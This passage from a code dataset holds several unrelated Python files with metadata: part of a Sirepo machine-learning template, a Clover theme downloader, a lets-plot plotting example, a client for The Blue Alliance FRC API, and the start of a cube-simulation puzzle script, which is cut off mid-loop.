row = r\n res.rowCount += 1\n if not row or len(row) == 1:\n return PKDict(\n error='Invalid CSV file: no columns detected'\n )\n # csv file may or may not have column names\n # if any value in the first row is numeric, assume no headers\n if list(filter(lambda x: template_common.NUMERIC_RE.search(x), row)):\n row = ['column {}'.format(i + 1) for i in range(len(row))]\n res.hasHeaderRow = False\n res.colsWithNonUniqueValues = _cols_with_non_unique_values(\n filename,\n res.hasHeaderRow,\n row,\n )\n res.header = row\n res.inputOutput = ['none' for i in range(len(row))]\n return res\n\n\ndef _cols_with_non_unique_values(filename, has_header_row, header):\n # TODO(e-carlin): support npy\n assert not re.search(r'\\.npy$', str(filename)), \\\n f'numpy files are not supported path={filename}'\n v = sirepo.numpy.ndarray_from_csv(_filepath(filename), has_header_row)\n res = PKDict()\n for i, c in enumerate(np.all(v == v[0,:], axis = 0)):\n if not c:\n continue\n res[header[i]] = True\n return res\n\n\ndef _compute_clusters(report, plot_data):\n\n from sirepo.analysis import ml\n method_params = PKDict(\n agglomerative=PKDict(\n count=report.clusterCount,\n ),\n dbscan=PKDict(\n eps=report.clusterDbscanEps,\n ),\n gmix=PKDict(\n count=report.clusterCount,\n seed=report.clusterRandomSeed,\n ),\n kmeans=PKDict(\n count=report.clusterCount,\n seed=report.clusterRandomSeed,\n kmeans_init=report.clusterKmeansInit\n ),\n )\n\n cols = []\n if 'clusterFields' not in report:\n if len(cols) <= 1:\n raise sirepo.util.UserAlert('At least two cluster fields must be selected', 'only one cols')\n for idx in range(len(report.clusterFields)):\n if report.clusterFields[idx]:\n cols.append(idx)\n if len(cols) <= 1:\n raise sirepo.util.UserAlert('At least two cluster fields must be selected', 'only one cols')\n x_scale = sirepo.analysis.ml.scale_data(plot_data[:, cols], [\n report.clusterScaleMin,\n report.clusterScaleMax,\n ])\n group = sirepo.analysis.ml.METHODS[report.clusterMethod](\n x_scale, method_params[report.clusterMethod]\n )\n count = len(set(group)) if report.clusterMethod == 'dbscan' else report.clusterCount\n return PKDict(\n group=group.tolist(),\n count=count,\n )\n\n\ndef _compute_numpy_info(filename):\n #TODO(pjm): compute column info from numpy file\n raise NotImplementedError()\n\n\ndef _confusion_matrix_to_heatmap_report(frame_args, filename, title):\n r = pkjson.load_any(frame_args.run_dir.join(filename))\n a = None\n for y, _ in enumerate(r.matrix):\n for x, v in enumerate(r.matrix[y]):\n t = np.repeat([[x, y]], v, axis=0)\n a = t if a is None else np.vstack([t, a])\n labels = _get_classification_output_col_encoding(frame_args)\n if labels:\n labels = list(labels.values())\n else:\n labels = r.labels\n return template_common.heatmap(\n a,\n PKDict(histogramBins=len(r.matrix)),\n plot_fields=PKDict(\n labels=labels,\n title=title.format(**r),\n x_label='Predicted',\n y_label='True',\n ),\n )\n\n\ndef _error_rate_report(frame_args, filename, x_label):\n v = np.load(str(frame_args.run_dir.join(filename)))\n return _report_info(\n v[:, 0],\n [PKDict(\n points=v[:, 1].tolist(),\n label='Mean Error',\n )],\n ).pkupdate(PKDict(\n x_label=x_label,\n ))\n\n\ndef _extract_analysis_report(run_dir, sim_in):\n x, plots, title, fields, summary_data = get_analysis_report(run_dir, sim_in)\n _write_report(x, plots, title, fields=fields, summary_data=summary_data)\n\n\ndef _extract_column(run_dir, idx):\n y = _read_file_column(run_dir, 'scaledFile', idx)\n return np.arange(0, len(y)), y\n\n\ndef _extract_file_column_report(run_dir, sim_in):\n m = sim_in.models[sim_in.report]\n idx = m.columnNumber\n x, y = _extract_column(run_dir, idx)\n if np.isnan(y).any():\n template_common.write_sequential_result(PKDict(\n error='Column values are not numeric',\n ))\n return\n if 'x' in m and m.x is not None and m.x >= 0:\n _, x = _extract_column(run_dir, m.x)\n _write_report(\n x,\n [_plot_info(y, style='scatter')],\n sim_in.models.columnInfo.header[idx],\n )\n\n\ndef _extract_fft_report(run_dir, sim_in):\n x, plots, title, summary_data = get_fft_report(run_dir, sim_in)\n _write_report(x, plots, title, fields=PKDict(x_label='f [Hz]'), summary_data=summary_data)\n\n\ndef _extract_partition_report(run_dir, sim_in):\n idx = sim_in.models[sim_in.report].columnNumber\n d = PKDict(\n train=_read_file_column(run_dir, 'trainFile', idx),\n test=_read_file_column(run_dir, 'testFile', idx),\n )\n if sim_in.models.dataFile.appMode == 'regression':\n d.validate = _read_file_column(run_dir, 'validateFile', idx)\n r = []\n for name in d:\n _update_range(r, d[name])\n plots = []\n for name in d:\n x, y = _histogram_plot(d[name], r)\n plots.append(_plot_info(y, name))\n _write_report(\n x,\n plots,\n title=sim_in.models.columnInfo.header[idx],\n )\n\n\ndef _extract_partition_selection(run_dir, sim_in):\n # return report with input0 and output0\n info = sim_in.models.columnInfo\n in_idx = info.inputOutput.index('input')\n out_idx = info.inputOutput.index('output')\n x, y = _extract_column(run_dir, in_idx)\n _, y2 = _extract_column(run_dir, out_idx)\n _write_report(\n x,\n [\n _plot_info(y, info.header[in_idx]),\n _plot_info(y2, info.header[out_idx]),\n ],\n )\n\n\ndef _filename(name):\n return _SIM_DATA.lib_file_name_with_model_field('dataFile', 'file', name)\n\n\ndef _filepath(name):\n return _SIM_DATA.lib_file_abspath(_filename(name))\n\n\ndef _fit_animation(frame_args):\n idx = int(frame_args.columnNumber)\n frame_args.histogramBins = 30\n info = frame_args.sim_in.models.columnInfo\n header = []\n for i in range(len(info.inputOutput)):\n if info.inputOutput[i] == 'output':\n header.append(info.header[i])\n return template_common.heatmap(\n [\n _read_file(frame_args.run_dir, _OUTPUT_FILE.predictFile)[:, idx],\n _read_file(frame_args.run_dir, _OUTPUT_FILE.testFile)[:, idx],\n ],\n frame_args,\n PKDict(\n x_label='',\n y_label='',\n title=header[idx],\n hideColorBar=True,\n ),\n )\n\n\ndef _generate_parameters_file(data):\n report = data.get('report', '')\n dm = data.models\n res, v = template_common.generate_parameters_file(data)\n v.dataFile = _filename(dm.dataFile.file)\n v.pkupdate(\n inputDim=dm.columnInfo.inputOutput.count('input'),\n layerImplementationNames=_layer_implementation_list(data),\n neuralNetLayers=dm.neuralNet.layers,\n outputDim=dm.columnInfo.inputOutput.count('output'),\n ).pkupdate(_OUTPUT_FILE)\n v.columnTypes = '[' + ','.join([ \"'\" + v + \"'\" for v in dm.columnInfo.inputOutput]) + ']'\n res += template_common.render_jinja(SIM_TYPE, v, 'scale.py')\n if 'fileColumnReport' in report or report == 'partitionSelectionReport':\n return res\n if _is_sim_report(report):\n return res\n v.hasTrainingAndTesting = v.partition_section0 == 'train_and_test' \\\n or v.partition_section1 == 'train_and_test' \\\n or v.partition_section2 == 'train_and_test'\n res += template_common.render_jinja(SIM_TYPE, v, 'partition.py')\n if 'partitionColumnReport' in report:\n res += template_common.render_jinja(SIM_TYPE, v, 'save-partition.py')\n return res\n if dm.dataFile.appMode == 'classification':\n res += template_common.render_jinja(SIM_TYPE, v, 'classification-base.py')\n d = PKDict(\n decisionTree='decision-tree',\n knn='knn',\n linearSvc='linear-svc',\n logisticRegression='logistic-regression',\n )\n return res + template_common.render_jinja(\n SIM_TYPE,\n v,\n f'{d[dm.classificationAnimation.classifier]}.py',\n )\n res += template_common.render_jinja(SIM_TYPE, v, 'build-model.py')\n res += template_common.render_jinja(SIM_TYPE, v, 'train.py')\n return res\n\n\ndef _get_classification_output_col_encoding(frame_args):\n try:\n return simulation_db.read_json(\n frame_args.run_dir.join(_OUTPUT_FILE.classificationOutputColEncodingFile),\n )\n except Exception as e:\n if pkio.exception_is_not_found(e):\n # no file exists, data may be only numeric values\n return PKDict()\n raise e\n\n\ndef _get_fit_report(report, x_vals, y_vals):\n fit_x, fit_y, fit_y_min, fit_y_max, param_vals, param_sigmas = \\\n sirepo.analysis.fit_to_equation(\n x_vals,\n y_vals,\n report.fitEquation,\n report.fitVariable,\n report.fitParameters,\n )\n plots = [\n PKDict(\n points=fit_y.tolist(),\n x_points=fit_x.tolist(),\n label='fit',\n ),\n PKDict(\n points=fit_y_min.tolist(),\n x_points=fit_x.tolist(),\n label='confidence',\n _parent='confidence'\n ),\n PKDict(\n points=fit_y_max.tolist(),\n x_points=fit_x.tolist(),\n label='',\n _parent='confidence'\n ),\n ]\n return param_vals, param_sigmas, plots\n\n\ndef _histogram_plot(values, vrange):\n hist = np.histogram(values, bins=20, range=vrange)\n x = []\n y = []\n for i in range(len(hist[0])):\n x.append(hist[1][i])\n x.append(hist[1][i + 1])\n y.append(hist[0][i])\n y.append(hist[0][i])\n x.insert(0, x[0])\n y.insert(0, 0)\n return x, y\n\n\ndef _is_sim_report(report):\n #return 'analysisReport' in report or report in _SIM_REPORTS\n return any([r in report for r in _SIM_REPORTS])\n\n\ndef _is_valid_report(report):\n return 'fileColumnReport' in report or 'partitionColumnReport' in report or \\\n _is_sim_report(report) or report in _REPORTS\n\n\ndef _layer_implementation_list(data):\n res = {}\n for layer in data.models.neuralNet.layers:\n res[layer.layer] = 1\n return res.keys()\n\n\ndef _plot_info(y, label='', style=None):\n return PKDict(points=list(y), label=label, style=style)\n\n\ndef _read_file(run_dir, filename):\n res = np.load(str(run_dir.join(filename)))\n if len(res.shape) == 1:\n res.shape = (res.shape[0], 1)\n return res\n\n\ndef _read_file_column(run_dir, name, idx):\n return _read_file(run_dir, _OUTPUT_FILE[name])[:, idx]\n\n\ndef _read_file_with_history(run_dir, filename, report=None):\n import copy\n res = _read_file(run_dir, filename)\n if not report:\n return res\n if 'history' in report:\n for action in report.history:\n if action.action == 'trim':\n idx = int(action.trimField)\n res = res[\n (res[:,idx] >= action.trimMin) & (res[:, idx] <= action.trimMax)\n ]\n elif action.action == 'cluster':\n report2 = copy.deepcopy(report)\n report2.update(action)\n clusters = _compute_clusters(report2, res)\n labels = np.array(clusters.group)\n res = res[labels == action.clusterIndex,:]\n return res\n\n\ndef _report_info(x, plots, title='', fields=PKDict(), summary_data=PKDict()):\n res = PKDict(\n title=title,\n x_range=[float(min(x)), float(max(x))],\n y_label='',\n x_label='',\n x_points=list(x),\n plots=plots,\n y_range=template_common.compute_plot_color_and_range(plots),\n summaryData=summary_data,\n )\n res.update(fields)\n return res\n\n\ndef _update_range(vrange, values):\n minv = min(values)\n maxv = max(values)\n if not vrange:\n vrange.append(minv)\n vrange.append(maxv)\n return\n if vrange[0] > minv:\n vrange[0] = minv\n if vrange[1] < maxv:\n vrange[1] = maxv\n\n\ndef _write_report(x, plots, title='', fields=PKDict(), summary_data=PKDict()):\n template_common.write_sequential_result(_report_info(\n x, plots, title, fields=fields, summary_data=summary_data\n ))\n","sub_path":"sirepo/template/ml.py","file_name":"ml.py","file_ext":"py","file_size_in_byte":22236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"145544701","text":"import os\nfrom utils import terminal, path\nfrom sys import argv\nfrom pathlib import Path\n\n'''Download clover theme\npython download_theme.py path/to/themes/theme_name\n'''\n\n\ndef download_theme(_path, name):\n _path = Path(_path)\n _path.mkdir(parents=True, exist_ok=True)\n\n terminal.Title('Downloading theme {}...'.format(name))\n\n zipfile = Path(_path, name + '.zip')\n os.system('git archive --remote=git://git.code.sf.net/p/cloverefiboot/themes HEAD themes/{} -o {}'.format(name, zipfile))\n path.unzip(zipfile, _path.parent)\n path.rm(zipfile)\n\n terminal.Title('Theme {} downloaded into {}'.format(\n name, _path))\n\n\nif __name__ == \"__main__\":\n download_theme(path.dst.parent, path.dst.name)\n","sub_path":"Script/download_theme.py","file_name":"download_theme.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"240406138","text":"\"\"\"\r\nGraph Building\r\r\n==============\r\r\n\r\r\n``ggplot()`` function begins a plot that you finish by adding layers.\r\r\n\r\r\nSee\r\r\n`ggplot() `__.\r\r\n\r\n\"\"\"\r\n\r\n# sphinx_gallery_thumbnail_path = \"gallery_py\\_basics\\_graph_building.png\"\r\n\r\nimport pandas as pd\r\n\r\nfrom lets_plot import *\r\nLetsPlot.setup_html()\r\n\r\n# %%\r\n\r\ndf = pd.read_csv('https://raw.githubusercontent.com/JetBrains/lets-plot-docs/master/data/mpg.csv')\r\n\r\n# %%\r\n\r\nggplot(df, aes('cty', 'hwy')) + \\\r\n geom_point(aes(color='cyl')) + \\\r\n geom_smooth(method='lm') + \\\r\n coord_cartesian() + \\\r\n scale_color_brewer(type='div', palette='Spectral')","sub_path":"docs/_downloads/c4517d2e16d241fbf9d1f5aefd4fba4c/plot__graph_building.py","file_name":"plot__graph_building.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"563914402","text":"#TBApi - BLUE ALLIANCE API FOR PYTHON\n\nimport os\nimport sys\nimport requests\nimport datetime\nimport numpy as np\nfrom numpy import array as np_array\n\n#Class that defines an FRC team. Variables are automatically set when created. raw variable contains the raw json array that TBA returned\nclass TBATeam:\n def __init__(self, raw_json):\n self.raw = raw_json\n self.website = raw_json['website']\n self.name = raw_json['name']\n self.locality = raw_json['locality']\n self.region = raw_json['region']\n self.country_name = raw_json['country_name']\n self.location = raw_json['location']\n self.team_number = raw_json['team_number']\n self.number = raw_json['team_number']\n self.key = raw_json['key']\n self.nickname = raw_json['nickname']\n self.nick = raw_json['nickname']\n self.rookie_year = raw_json['rookie_year']\n self.motto = raw_json['motto']\n\n#Class that defines an FRC event. Variables are automatically set when created. raw variable contains the raw json array that TBA returned\nclass TBAEvent:\n def __init__(self, raw_json):\n self.raw = raw_json\n self.key = raw_json['key']\n self.website = raw_json['website']\n self.official = raw_json['official']\n self.end_date = raw_json['end_date']\n self.name = raw_json['name']\n self.short_name = raw_json['short_name']\n self.facebook_eid = raw_json['facebook_eid']\n self.event_district_string = raw_json['event_district_string']\n self.venue_address = raw_json['venue_address']\n self.event_district = raw_json['event_district']\n self.location = raw_json['location']\n self.event_code = raw_json['event_code']\n self.year = raw_json['year']\n self.webcast = raw_json['webcast']\n self.timezone = raw_json['timezone']\n self.alliances = raw_json['alliances']\n self.event_type_string = raw_json['event_type_string']\n self.start_date = raw_json['start_date']\n self.event_type = raw_json['event_type']\n\n#Class that defines the stats from a given event. raw variable contains the raw json array that is returned by the blue alliance API. Due to TBA not being consistant in what they return, not all values will be present with data on each call.\nclass TBAEventStats:\n def __init__(self, raw_json):\n self.raw = raw_json\n try:\n self.opr = TBAEventStatsCategory(raw_json[\"oprs\"]) #sets up a TBAEventStatsCategory for the OPR stat if it is passed back by TBA\n except:\n pass\n try:\n self.ccwm = TBAEventStatsCategory(raw_json[\"ccwms\"]) #sets up a TBAEventStatsCategory for the CCWM stat if it is passed back by TBA\n except:\n pass\n try:\n self.dpr = TBAEventStatsCategory(raw_json[\"dprs\"]) #sets up a TBAEventStatsCategory for the DPR stat if it is passed back by TBA\n except:\n pass\n try:\n self.year_specific = raw_json['year_specific'] #sets up a TBAEventStatsCategory for the Year Specific Stats if it they are passed back by TBA\n except:\n pass\n\n#Class that defines the event stats under a given category (opr, ccwm, dpr, year_specific) with a method to get the stats under this category given a team_key or team_number\nclass TBAEventStatsCategory:\n def __init__(self, raw_json):\n self.raw = raw_json\n\n def get_team(self, team_number): #get the stats value for a given team\n if not isinstance(team_number, str):\n team_number = str(team_number)\n else:\n if team_number.startswith('frc'):\n team_number = team_number[3:]\n\n if not team_number.isdigit():\n print(\"\\n[TBA-API] BAD TEAM NUMBER SUPLIED WITH TBAEventStatsObj.get_team(team_number)\\n\")\n return\n\n team_stat = self.raw[team_number]\n return team_stat\n\n#Class that defines the rankings of a given event, and provides methods to get the TBAEventTeamRank objects for given teams or event ranks\nclass TBAEventRankings:\n def __init__(self, raw_json):\n self.raw = raw_json\n self.keys = raw_json[0]\n\n rank_dictionary = {}\n team_rank_dictionary = {}\n\n del raw_json[0]\n\n for key in raw_json:\n team_dictionary = TBAEventTeamRank(self.keys, key) #creates a TBAEventTeamRank object for the given team as found in the rank dictionary passed back by TBA\n\n team_rank = str(key[0])\n team_number = str(key[1])\n\n rank_dictionary[team_rank] = team_dictionary #indexes the given object by event rank\n team_rank_dictionary[team_number] = team_dictionary #indexes the given object by team number\n\n self.rankings = rank_dictionary\n self.team_rankings = team_rank_dictionary\n\n def get_rank(self, rank): #gets the TBAEventTeamRank obj for a given event rank\n team_obj = self.rankings[str(rank)]\n return team_obj\n\n def get_rank_by_team(self, team_number): #gets the TBAEventTeamRank obj for a given team number\n if not isinstance(team_number, str):\n team_number = str(team_number)\n else:\n if team_number.startswith('frc'):\n team_number = team_number[3:]\n\n if not team_number.isdigit():\n print(\"\\n[TBA-API] BAD TEAM NUMBER SUPLIED WITH TBAEventRankings.get_rank_by_team(team_number)\\n\")\n return\n\n team_obj = self.team_rankings[team_number]\n\n return team_obj\n\n#Class that Creates a object with call attributes based on what is returned from TBA since it is not standardized\nclass TBAEventTeamRank:\n def __init__(self, key_list, team_list):\n self.raw = team_list\n\n check_pos = 0\n\n for key in key_list:\n if key is \"Record (W-L-T)\":\n key = \"record\"\n key = key.lower().replace(\" \", \"_\").replace(\"&\",\"and\").replace(\"/\",\"_\").replace(\"-\",\"_\")\n setattr(self, key, team_list[check_pos])\n check_pos += 1\n\n#Class that defines the District Points from a given event. This is by event, but the event term has been removed from the class name to prevent issues that arise with long class names\nclass TBADistrictPoints:\n def __init__(self, raw_json):\n self.raw = raw_json\n self.points = raw_json['points']\n\n def get_team(self, team_key):\n if isinstance(team_key, str) and team_key.isdigit():\n team_key = 'frc' + team_key\n else:\n team_key = 'frc' + str(team_key)\n\n dist_points_json = self.points[team_key]\n\n dist_points_obj = TBADistrictPointsTeam(dist_points_json)\n\n return dist_points_obj\n\n#Class that defines the District points of a given team, created by get_team in TBADistrictPoints\nclass TBADistrictPointsTeam:\n def __init__(self, raw_json):\n self.raw = raw_json\n self.alliance_points = raw_json['alliance_points']\n self.total = raw_json['total']\n self.award_points = raw_json['award_points']\n self.elim_points = raw_json['elim_points']\n self.qual_points = raw_json['qual_points']\n\n#Class that defines an FRC match. Variables are automatically set when created. raw variable contains the raw json array that TBA returned\nclass TBAMatch:\n def __init__(self, raw_json):\n self.raw = raw_json\n self.comp_level = raw_json['comp_level']\n self.match_number = raw_json['match_number']\n self.videos = raw_json['videos']\n self.time_string = raw_json['time_string']\n self.set_number = raw_json['set_number']\n self.key = raw_json['key']\n self.time = raw_json['time']\n self.score_breakdown = raw_json['score_breakdown']\n self.alliances = raw_json['alliances']\n self.event_key = raw_json['event_key']\n\n#Class that defines an FRC award. Variables are automatically set when created. raw variable contains the raw json array that TBA returned\nclass TBAAward:\n def __init__(self, raw_json):\n self.raw = raw_json\n self.event_key = raw_json['event_key']\n self.award_type = raw_json['award_type']\n self.type = raw_json['award_type']\n self.name = raw_json['name']\n self.recipient_list = raw_json['recipient_list']\n self.year = raw_json['year']\n\n#Class that defines an FRC media item (video, photo, etc). Variables are automatically set when created. raw variable contains the raw json array that TBA returned\nclass TBAMedia:\n def __init__(self, raw_json):\n self.raw = raw_json\n self.type = raw_json['type']\n self.details = raw_json['details']\n self.foreign_key = raw_json['foreign_key']\n\nclass TBARobotGroup:\n def __init__(self, raw_json):\n self.raw = raw_json\n\n def get_year(self, year):\n year_json = self.raw[str(year)]\n year_obj = TBARobot(year_json)\n\n return year_obj\n\n#Class that defines an FRC robot. Variables are automatically set when created. raw variable contains the raw json array that TBA returned\nclass TBARobot:\n def __init__(self, raw_json):\n self.raw = raw_json\n self.team_key = raw_json['team_key']\n self.name = raw_json['name']\n self.key = raw_json['key']\n self.year = raw_json['year']\n\n#This is the main class. All reuqests are made through here\nclass TBAParser:\n def __init__(self, team_number, package_name, version_number): #Init method. Requires info to identify the end user of the requests made to TBA\n self.team_number = team_number\n self.package_name = package_name\n self.version_number = version_number\n self.header = {'X-TBA-App-Id': 'frc{team}:{package}:{version}'.format(team = team_number, package = package_name, version = version_number)}\n self.baseURL = 'http://www.thebluealliance.com/api/v2'\n\n def __pull_team_list_by_page(self, page): #Helper function to make code for get_team_list simpler.\n request = (self.baseURL + \"/teams/\" + str(page))\n response = requests.get(request, headers = self.header)\n json_list = response.json()\n team_list = []\n\n for team in json_list:\n team_obj = TBATeam(team)\n team_list = team_list + [team_obj]\n\n return team_list\n\n def get_team_list(self, page = None): #get list of FRC teams' TBATeam objects, either the entire list, or by page #\n if not page is None:\n team_list = self.__pull_team_list_by_page\n else:\n team_list = []\n\n for page in range(0,100): #Allows for significant team-expansion (up to 55000 FRC teams). At that point in time, we will probably be on APIv3 or more.\n partial_list = self.__pull_team_list_by_page(page)\n\n try:\n if not partial_list[0] is None:\n team_list = team_list + partial_list #combine partial with previously set up 'full' list to grow list as we iterate over the range of pages\n else:\n break #kill loop once we hit NULL data\n except:\n break #kill loop once we hit NULL data\n\n return team_list\n\n def get_team(self, team_key): #get a team's TBATeam object\n request = (self.baseURL + \"/team/\" + team_key)\n response = requests.get(request, headers = self.header)\n json = response.json()\n team_object = TBATeam(json)\n\n return team_object\n\n def __pull_team_events(self, team_key, year): #helper function to pull team events for use in get_team_events with a year passed in\n request = (self.baseURL + \"/team/\" + team_key + \"/\" + str(year) + \"/events\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n event_list = []\n\n for event in json:\n event_obj = TBAEvent(event)\n event_list = event_list + [event_obj]\n\n return event_list\n\n def __pull_all_team_events(self, team_key): #helper function to pull team events for use in get_team_events without a year passed in\n request = (self.baseURL + \"/team/\" + team_key + \"/history/events\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n event_list = []\n\n for event in json:\n event_obj = TBAEvent(event)\n event_list = event_list + [event_obj]\n\n return event_list\n\n def get_team_events(self, team_key, year=None): #Get a list of event objects that a given team has competed in\n if not year is None:\n event_list = self.__pull_team_events(team_key, year)\n else:\n event_list = self.__pull_all_team_events(team_key)\n return event_list\n\n def get_team_event_awards(self, team_key, event_key): #Get a list of all award objects that a team has won at a given event\n request = (self.baseURL + \"/team/\" + team_key + \"/event/\" + event_key + \"/awards\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n award_list = []\n\n for award in json:\n award_obj = TBAAward(award)\n award_list = award_list + [award_obj]\n\n return award_list\n\n def get_team_event_matches(self, team_key, event_key): #Get a list of all match objects that a team competed in at a given event\n request = (self.baseURL + \"/team/\" + team_key + \"/event/\" + event_key + \"/matches\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n match_list = []\n\n for match in json:\n match_obj = TBAMatch(match)\n match_list = match_list + [match_obj]\n\n return match_list\n\n def get_team_years_participated(self, team_key): #Get a list of years participated\n request = (self.baseURL + \"/team/\" + team_key + \"/years_participated\")\n response = requests.get(request, headers = self.header)\n years_participated = response.json()\n\n return years_participated\n\n def __pull_team_media(self, team_key, year): #pulls team media for use in get_team_media\n request = (self.baseURL + \"/team/\" + team_key + \"/\" + str(year) + \"/media\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n media_list = []\n\n for media in json:\n media_obj = TBAMedia(media)\n media_list = media_list + [media_obj]\n\n return media_list\n\n def get_team_media(self, team_key, year = None): #Get a list of all media objects a team is responsible for\n if not year is None:\n media_list = self.__pull_team_media(team_key, year)\n else:\n rookie_year = self.get_team(team_key).rookie_year\n current_year = datetime.datetime.now().year\n\n media_list = []\n\n for check_year in range(rookie_year, current_year):\n partial_list = self.__pull_team_media(team_key, check_year)\n media_list = media_list + partial_list\n\n return media_list\n\n def get_team_history_events(self, team_key): #Returns a list of all event objects a team has attended\n events_list = self.__pull_all_team_events(team_key)\n return events_list\n\n def get_team_history_awards(self, team_key): #Returns a list of all award objects a team has won\n request = (self.baseURL + \"/team/\" + team_key + \"/history/awards\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n award_list = []\n\n for award in json:\n award_obj = TBAAward(award)\n award_list = award_list + [award_obj]\n\n return award_list\n\n def get_team_history_robots(self, team_key): #Returns a list off all robot objects a team has made (seems to only work 2015 onwards)\n request = (self.baseURL + \"/team/\" + team_key + \"/history/robots\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n robo_container_obj = TBARobotGroup(json)\n\n return robo_container_obj\n\n def get_team_history_districts(self, team_key): #gets a list of districts a team has participated in by year\n request = (self.baseURL + \"/team/\" + team_key + \"/history/districts\")\n response = requests.get(request, headers = self.header)\n team_history_districts = response.json()\n\n return team_history_districts\n\n def calc_team_key(self, number): #Calculates a team's key given their team number\n key = \"frc\" + str(number)\n return key\n\n def get_event_list(self, year): #Returns a list of all event objects for a given year\n request = (self.baseURL + \"/events/\" + str(year))\n response = requests.get(request, headers = self.header)\n json = response.json()\n event_list = []\n\n for event in json:\n event_obj = TBAEvent(event)\n event_list = event_list + [event_obj]\n\n return event_list\n\n def get_event(self, event_key): #Returns a single event object given an event key\n request = (self.baseURL + \"/event/\" + event_key)\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n event_obj = TBAEvent(json)\n\n return event_obj\n\n def get_event_teams(self, event_key): #Returns a list of all team objects that attended an event\n request = (self.baseURL + \"/event/\" + event_key + \"/teams\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n team_list = []\n\n for team in json:\n team_obj = TBATeam(team)\n team_list = team_list + [team_obj]\n\n return team_list\n\n def get_event_matches(self, event_key): #Returns a list of all match objects in a given event\n request = (self.baseURL + \"/event/\" + event_key + \"/matches\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n match_list = []\n\n for match in json:\n match_obj = TBAMatch(match)\n match_list = match_list + [match_obj]\n\n return match_list\n\n def get_event_stats(self, event_key):\n request = (self.baseURL + \"/event/\" + event_key + \"/stats\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n event_stats = TBAEventStats(json)\n\n return event_stats\n\n def get_event_rankings(self, event_key):\n request = (self.baseURL + \"/event/\" + event_key + \"/rankings\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n event_rankings = TBAEventRankings(json)\n\n return event_rankings\n\n def get_event_awards(self, event_key): #Returns a list of all award objects given out at an event\n request = (self.baseURL + \"/event/\" + event_key + \"/awards\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n award_list = []\n\n for award in json:\n award_obj = TBAAward(award)\n award_list = award_list + [award_obj]\n\n return award_list\n\n def get_event_district_points(self, event_key): #returns a TBADistrictPoints obj, capable of method chaining\n request = (self.baseURL + \"/event/\" + event_key + \"/district_points\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n district_points_obj = TBADistrictPoints(json)\n\n return district_points_obj\n\n #Calculates event key from both year and event nickname.\n #Name variable does not have to be complete, but it must be properly capitalized and specific enough to specify a single event\n #Returns \"0\" is no events are found, \"1\" if more than one event is found, and event key otherwise.\n #ALL RETURNS ARE STRINGS\n #Based on method from https://github.com/Alexanders101/The-Blue-Alliance-Python-API/\n def calc_event_key(self, year, name):\n request = (self.baseURL + \"/events/\" + str(year))\n response = requests.get(request, headers = self.header)\n dictionary = response.json()\n events = np_array([[str(event['short_name']), str(event['key'])] for event in dictionary])\n ret = ''\n for sub in events[:, 0]:\n if sub[:len(name)].lower() == name.lower():\n if not ret == '':\n print(\"Multiple events found. Please refine your search.\")\n return '1'\n ret = sub\n curr = events[events[:, 0] == ret]\n if len(ret) == 0:\n print('No events found. Please ensure spelling and capitalization are correct.')\n return '0'\n return curr[0][1]\n\n def get_match(self, match_key): #Returns a single match object given the match key\n request = (self.baseURL + \"/match/\" + match_key)\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n match_obj = TBAMatch(json)\n\n return match_obj\n\n #Calculates match key from event key, competition level, match number, and, if needed, set number\n #Event key can be calculated using calc_event_key()\n #Comp level must be string: \"q\" for qualifying matches, \"ef\" for eighth final, \"qf\" for quarterfinal,\n # \"sf\" for semifinal or \"f\" for final\n #Match number is the standard match number. In elims, count restarts at 1 for every new set\n #Set number must be included for all requests except quals matches. This must even be included for finals, although it will always be 1\n def calc_match_key(self, event_key, comp_level, match_number, set_number = None):\n if not set_number == None:\n key = event_key + '_' + comp_level + str(set_number) + 'm' + str(match_number)\n else:\n key = event_key + '_' + comp_level + 'm' + str(match_number)\n return key\n\n def get_district_list(self, year):\n request = (self.baseURL + \"/districts/\" + str(year))\n response = requests.get(request, headers = self.header)\n district_list = response.json()\n\n return district_list\n\n def get_district_events(self, district_key, year): #Returns a list of event objects in a specific district\n request = (self.baseURL + \"/district/\" + district_key + \"/\" + str(year) + \"/events\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n event_list = []\n\n for event in json:\n event_obj = TBAEvent(event)\n event_list = event_list + [event_obj]\n\n return event_list\n\n def get_district_teams(self, district_key, year): #Returns a list of team objects in a specific district\n request = (self.baseURL + \"/district/\" + district_key + \"/\" + str(year) + \"/teams\")\n response = requests.get(request, headers = self.header)\n json = response.json()\n\n team_list = []\n\n for team in json:\n team_obj = TBATeam(team)\n team_list = team_list + [team_obj]\n\n return team_list\n","sub_path":"TBApi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":23110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"603567595","text":"#!/usr/bin/env python3\n\nif __name__ == '__main__':\n with open('data.txt', 'r') as file:\n raw_data = file.read()\n\n rows = raw_data.split('\\n') # Make sure there's no newline at the end of data\n\n # cubes = {}\n cubes = set()\n\n for i, row in enumerate(rows):\n for j, tile in enumerate(row):\n # cubes[(j, i, 0)] = tile == '#' # True if #, False if .\n if tile == '#':\n cubes.add((j, i, 0))\n\n for _ in range(0, 6):\n # initial_cubes = set(cubes.keys())\n initial_cubes = cubes\n # print(f\"Initial cubes: {initial_cubes}\")\n evaluated_cubes = set()\n new_cubes = set()\n\n for cube in initial_cubes:\n x, y, z = cube\n for nx in range(x - 1, x + 2):\n for ny in range(y - 1, y + 2):\n for nz in range(z - 1, z + 2):\n 